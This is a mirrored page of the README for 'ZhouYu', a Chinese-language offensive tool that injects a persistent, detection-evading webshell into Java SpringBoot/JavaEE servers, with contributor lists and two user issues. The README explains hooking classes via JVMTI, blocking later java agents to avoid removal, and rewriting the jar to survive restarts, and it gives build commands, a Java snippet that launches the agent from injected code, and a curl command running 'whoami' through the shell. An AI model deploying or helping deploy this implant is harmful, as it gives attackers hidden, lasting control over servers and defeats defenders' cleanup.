Code Monkey home page Code Monkey logo

zhouyu's Introduction

工具仅用于安全研究,禁止使用工具发起非法攻击,造成的后果使用者负责

ZhouYu -> 周瑜

Java - SpringBoot 持久化 WebShell(适配任何符合JavaEE规范的服务)

背景:后Spring时代,SpringBoot jar部署模式下,一般没有了JSP,所有的模板都在jar内,当大家都热衷于内存马的时候,发现很容易被查杀(网上查杀方式无外乎都是利用JVMTI重加载class的javaagent方式),并且重启后丢失!

  1. ZhouYu带来新的webshell写入手法,通过javaagent,利用JVMTI机制,在回调时重写class类,插入webshell,并通过阻止后续javaagent加载的方式,防止webshell被查杀

  2. 修改的class类插入webshell后,通过持久化到jar进行class替换,达到webshell持久化,任你如何重启都无法甩掉

一、打包编译

命令:

gradle :agent:shadowJar


./gradlew :agent:shadowJar

编译后得到 agent/build/libs/agent-1.0-SNAPSHOT-all.jar,即ZhouYu.jar

二、使用方式

两种场景:

  1. 当你知道jvm pid时,并且能写入临时文件(ZhouYu.jar),一般这种场景不太常见,测试场景比较多
java -jar ZhouYu.jar 23232,23232为需要attach的jvm进程号!
  1. 能执行一小段代码(内存shell的原理一般是反序列化时加载一段恶意字节码)

先把编译后得到的ZhouYu.jar写到临时目录,例:/tmp/ZhouYu.jar

接着执行下面代码:

try {
  String pid = java.lang.management.ManagementFactory.getRuntimeMXBean().getName();
  int indexOf = pid.indexOf('@');
  if (indexOf > 0) {
    pid = pid.substring(0, indexOf);
    Runtime.getRuntime().exec(String.format("java -jar /tmp/ZhouYu.jar %s", pid));
  }
} catch (Throwable throwable) {

}
  1. 执行命令
curl -XGET "http://127.0.0.1:8080?cmd=whoami"

WARNNING

为了防止出现生产事故,在对原有jar(A.jar)进行替换修改前,会对其进行备份,备份到当前目录下(命名为.A.jar.bk)

zhouyu's People

Contributors

threedr3am avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

crackercat 2217936322 guokers dycsy kungia09 changheluor007 yeshuibo amakerlee n1f2c3 r4b3rt bi5cui7 selfevo lqtcts owwwo axax002 bzvs1992 h1d3r 02bx om1jerry cmgjsw idnu11 weiwhy goowen feisec ekko-zhao amjiyu actorexpose williematthewliu jeromeyoung kuustudio kb-8-byte gysf666 lucifaer xiumulty ios1024 h0ld1rs wayswei littlet1gger afwu liang2580 idaking darktemple9 heyzm y4tacker fwxiong conanjun zmdprogrom h30gyan vanpersiexp dongdabai ultramarine123 crj0b amad3u4 v1rtu0l xkroot zer0duck ddbull666 werwolfz simiaoxiaoseng nyx2022 tovd-go s0rryerr0r 2768210355 bravery9

zhouyu's Issues

上马失败

搭了个测试环境,Tomcat 8, JDK-1.8.0,Linux环境,用Agent上马提示报错

Exception in thread "main" java.lang.UnsatisfiedLinkError: sun.tools.attach.WindowsVirtualMachine.init()V
        at sun.tools.attach.WindowsVirtualMachine.init(Native Method)
        at sun.tools.attach.WindowsVirtualMachine.<clinit>(WindowsVirtualMachine.java:192)
        at sun.tools.attach.WindowsAttachProvider.attachVirtualMachine(WindowsAttachProvider.java:69)
        at com.sun.tools.attach.VirtualMachine.attach(VirtualMachine.java:208)
        at zhouyu.agent.ZhouYu.main(ZhouYu.java:45)

emm 是哪里有问题吗?Tomcat是用tomcat启动的,运行java -jar ZhouYu.jar使用了root权限和tomcat权限,但都报同样错误。

无法编译

你好,我这边得去掉build.gradle里的 useJUnitPlatform() 才能编译,看你也没做单测,不如删掉好了。

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.